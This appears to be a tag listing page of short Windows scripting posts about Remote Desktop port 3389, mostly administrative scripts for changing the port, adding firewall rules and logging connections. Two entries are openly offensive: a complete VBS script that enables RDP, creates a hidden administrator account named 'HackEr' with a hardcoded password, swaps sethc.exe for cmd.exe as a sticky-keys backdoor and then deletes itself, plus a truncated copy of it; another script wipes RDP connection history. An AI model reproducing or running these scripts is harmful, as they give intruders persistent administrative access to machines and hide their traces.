Tag:3389

  • Log in the server remote terminal 3389 with batch processing

    Time:2020-11-13

    It is useful if the server has multiple users or to see if there are other illegal users logged in.In the D disk directory, create two files “ts2003. Bat” (the script file that the user runs when logging in) and “ts2003. Log” (log file).Write “ts2003. Bat” script file: Copy codeThe code is as follows:   time […]

  • Vbs script for changing 3389 remote desktop port

    Time:2020-11-4

    Set WshShell=CreateObject(“Wscript.Shell”) Function Imput() Import port = InputBox (“please input a port number. Note: this port number cannot be used by other programs at present, otherwise the terminal service will be affected”, “change terminal port number”, “3389“, 100, 100)If imputport<>”” Then If IsNumeric(imputport) Then WshShell.RegWrite “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber”,imputport,”REG_DWORD” WshShell.RegWrite “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber”,imputport,”REG_DWORD” wscript.echo “Operation successful”Else  wscript.echo “Input error, please re-enter”Imput() End If Else  wscript.echo “Operation cancelled”End If End Function Imput() […]

  • XP, 2003 open 3389 + non net create management user + Shift backdoor + self delete script vbs

    Time:2020-10-3

    Copy codeThe code is as follows: on error resume next  const HKEY_LOCAL_MACHINE = &H80000002  strComputer = “.”  Set StdOut = WScript.StdOut  Set oReg=GetObject(“winmgmts:{impersonationLevel=impersonate}!\\” &_   strComputer & “\root\default:StdRegProv”)  strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server”  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath  strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp”  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath  strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp”  strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server”  strValueName = “fDenyTSConnections”  dwValue = 0  oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue  strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp”  strValueName = “PortNumber”  dwValue = 3389  oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue  strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp”  strValueName = “PortNumber”  dwValue = 3389  oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue  on error resume next  dim username,password:If Wscript.Arguments.Count  Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username=”HackEr”:password=”393214425″:end if:set wsnetwork=CreateObject(“WSCRIPT.NETWORK”):os=”WinNT://”&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&”/Administrators,group”):Set od=ob.Create(“user”,username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&”/”&username&”,user”):oe.Add(of.ADsPath)’wscript.echo of.ADsPath  On Error Resume Next  Dim obj, success  Set obj = CreateObject(“WScript.Shell”)  success = obj.run(“cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy; %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe&copy; %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe”, 0, True)  CreateObject(“Scripting.FileSystemObject”).DeleteFile(WScript.ScriptName)

  • Code of modifying 3389 port of remote desktop and adding it to Windows Firewall with vbs

    Time:2020-9-18

    Save the following code as. VBS, double-click to run. Then restart the system and change the default port 3389 of the remote desktop of the system ‘##################### ‘VBS modifies the default port of the remote desktop and adds it to the windows firewall‘author 51 windows.Net‘56868 is the port to set‘##################### Set WshShell = WScript.CreateObject(“WScript.Shell”) WshShell.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber”,56868,”REG_DWORD” WshShell.RegWrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber”,56868,”REG_DWORD” Function Addfirewall(name,port,state)  Set objFirewall = CreateObject(“HNetCfg.FwMgr”) […]

  • Record the batch bat of 3389 remote desktop IP every time

    Time:2020-6-20

    Copy the following code and save it as a batch file. Double click it! Copy codeThe code is as follows: MD C:\WINDOWS\PDPLOG echo date /t ^>^>RDPlog.txt >>C:\WINDOWS\PDPLOG\PdPLOG.CMD echo time /t ^>^>RDPlog.txt >>C:\WINDOWS\PDPLOG\PdPLOG.CMD echo netstat -n -p tcp ^| find “:3389“^>^>RDPlog.txt >>C:\WINDOWS\PDPLOG\PdPLOG.CMD echo start Explorer >>C:\WINDOWS\PDPLOG\PdPLOG.CMD :: add the IP used by the user to automatically […]

  • Batch processing for clearing 3389 remote desktop connection records

    Time:2020-6-19

    Copy codeThe code is as follows: @echo off @reg delete “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default” /va /f @del “%USERPROFILE%\My Documents\Default.rdp” /a @exit /VA delete all key values below /F do not prompt /A delete hidden files Save as batch. Just run.

  • VBS that can open 3389 to create user sticky key back door

    Time:2020-4-27

    on error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = “.” Set StdOut = WScript.StdOut Set oReg=GetObject(“winmgmts:{impersonationLevel=impersonate}!\\” &_ strComputer & “\root\default:StdRegProv”) strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server” oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp” oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server” strValueName = “fDenyTSConnections” dwValue = 0 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = “SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp” strValueName = […]

  • When an IP is connected to port 3389 of my machine, the alarm script

    Time:2020-4-17

    I know that I can only access a certain IP with IPSec. I can use netstat-an to see that an IP is accessing port 3389 of my machine. I want to monitor the access of an IP and then alarm or input > *. TXT… Can’t you only allow single IP connection in the firewall?Scripts […]

  • Modify Bat Batch Processing Code for Windows Server 2008 R2 3389 Remote Port

    Time:2019-3-31

    The function is to repair win2008 R2 server remote port 6637 by batch processing and add it to the firewall. @ ECHO OFF color 0A ECHO —————————————————————————- ECHO. ECHO Copyright of Glacier Network ECHO. ECHO ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ECHO. echo REGEDIT4 >c:\windows\reg.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Tenninal Server] >> c:\windows\reg.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Tenninal Server\WinStations] >> c:\windows\reg.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Tenninal Server\WinStations\RDP-Tcp] >> c:\windows\reg.reg […]